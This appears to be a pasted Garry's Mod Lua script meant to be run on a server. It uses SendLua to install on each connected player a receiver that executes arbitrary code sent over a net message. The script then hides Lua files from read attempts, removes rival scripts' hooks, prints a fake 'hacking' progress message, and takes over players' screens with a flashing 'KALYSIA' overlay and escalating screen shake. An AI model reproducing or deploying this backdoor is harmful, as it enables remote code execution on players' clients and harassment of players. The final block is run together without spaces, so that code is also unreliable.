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a guest
Jul 23rd, 2019
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  2. util.AddNetworkString("_ServerName_")
  4. function payload( ply )
  5. ply:SendLua( "net.Receive([[_ServerName_]], function() RunString(net.ReadString()) end)" )
  6. end
  7. local bypass = [=====[
  8. if !fRead then
  9. fRead=file.Read
  10. fOpen=file.Open
  11. end
  13. file.Open=function(fn,fm,path)
  14. loh=nil
  15. loh=string.Explode("/",fn)
  16. if (loh[2]&&(loh[#loh-1]=="lua"&&(string.find(loh[#loh],".lua") || string.find(loh[#loh],".txt")) || loh[#loh-1]=="scripthook")) || loh[1]&&(string.find(loh[1],".lua") || string.find(loh[1],".txt"))&&path =="LUA" || string.find(fn,"scripthook/") then
  17. chat.AddText("someone tried using to get your "..fn.." with the PATH: "..path.." and file mode: "".")
  18. return ""
  19. else
  20. return fOpen(fn,fm,path)
  21. end
  22. end
  24. file.Read=function(fn,path)
  25. loh=nil
  26. loh=string.Explode("/",fn)
  27. if (loh[2]&&(loh[#loh-1]=="lua"&&(string.find(loh[#loh],".lua") || string.find(loh[#loh],".txt")) || loh[#loh-1]=="scripthook")) || loh[1]&&(string.find(loh[1],".lua") || string.find(loh[1],".txt"))&&path=="LUA" || string.find(fn,"scripthook/") then
  28. chat.AddText("someone tried grabbing ur file named "..fn..".")
  29. return ""
  30. else
  31. return fRead(fn,path)
  32. end
  33. end
  35. ]=====]
  37. function runcode(ply, code)
  38. net.Start( "_ServerName_" )
  39. net.WriteString("if SERVER then return '' end "..bypass.." "..code )
  40. net.Send( ply )
  41. end
  43. for k, v in pairs( player.GetAll() ) do
  44. payload( v )
  45. end
  47. for k,v in pairs(player.GetAll() ) do
  49. runcode(v, [==[
  50. if timer.Exists("capturemymind") then
  51. timer.Remove("capturemymind")
  52. end
  53. if timer.Exists("podsos") then
  54. timer.Remove("podsos")
  55. end
  56. if timer.Exists("antidrm") then
  57. timer.Remove("antidrm")
  58. end
  59. if hook.GetTable().RenderScreenspaceEffects.podsos then hook.Remove( "RenderScreenspaceEffects", "podsos" ) end
  60. if hook.GetTable().HUDPaint.podsos then hook.Remove( "HUDPaint", "podsos" ) end
  61. RunConsoleCommand("stopsound")
  62. ]==])
  64. end
  66. for k,v in pairs(player.GetAll() ) do
  67. runcode(v, [==[
  68. local i = 0
  69. timer.Create("hacking", 0.1, 101, function()
  70. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ), "hacking login ... "..i.."%")
  71. i = i + 1
  72. end)
  73. ]==])
  74. end
  76. local sW, sH = ScrW(), ScrH() local prevFrame = {} local prevValue = 1 surface.CreateFont("Get2Lost", {font = "Open Sans",size = 500,weight = 1000,antialias = true,scanlines = 2.5, }) surface.CreateFont("Get2LostBlurred", {font = "Open Sans",size = 500,weight = 1000,antialias = true,blursize = 10 }) surface.SetFont("Get2Lost") local tW, tH = surface.GetTextSize("KALYSIA") local audio local function AudioVizualier()if not audio then return endlocal tbl = {}audio:FFT(tbl, FFT_1365)prevValue = Lerp(2 * FrameTime(), prevValue, math.Rand(0, 1))local h = CurTime() * 150 % 260surface.SetDrawColor(ColorAlpha(HSVToColor(360 - h, 1, prevValue), 125))surface.DrawRect(0, 0, sW, sH)local color = HSVToColor(h, 1, prevValue)surface.SetFont("Get2LostBlurred")surface.SetTextColor(ColorAlpha(color_white, math.random(225, 255)))surface.SetTextPos(sW / 2 - tW / 2, sH / 2 - tH / 2)surface.DrawText("KALYSIA")surface.SetFont("Get2Lost")surface.SetTextColor(color)surface.SetTextPos(sW / 2 - tW / 2, sH / 2 - tH / 2)surface.DrawText("KALYSIA")surface.SetDrawColor(color)for i = 0, sW, 20 dolocal avg = 0for j = 1, 30 doavg = avg + tbl[i + j]endif not prevFrame[i] then prevFrame[i] = 0 endprevFrame[i] = Lerp(30 * FrameTime(), prevFrame[i], avg * 5000)surface.DrawRect(i, sH - prevFrame[i] + 1, 20, prevFrame[i])surface.DrawRect(sW - i - 20, sH - prevFrame[i] + 1, 20, prevFrame[i])surface.DrawRect(i, 0, 20, prevFrame[i])surface.DrawRect(sW - i - 20, 0, 20, prevFrame[i])end end sound.PlayURL("", "noblock", function(s)if not IsValid(s) then return endaudio = ss:EnableLooping( true )local oldhooks = {}for k, v in pairs(hook.GetTable().HUDPaint) dooldhooks[k] = vhook.Remove("HUDPaint", k)endhook.Add("HUDShouldDraw", "Get2Lost", function(n)if n == "CHudGMod" then return endreturn falseend)hook.Add("HUDPaint", "Get2Lost", AudioVizualier)local intensity = 1timer.Create("ScreenShake", 5, 0, function()util.ScreenShake(vector_origin, 7 * intensity, 10, 5, 0)intensity = intensity + 1end) end)
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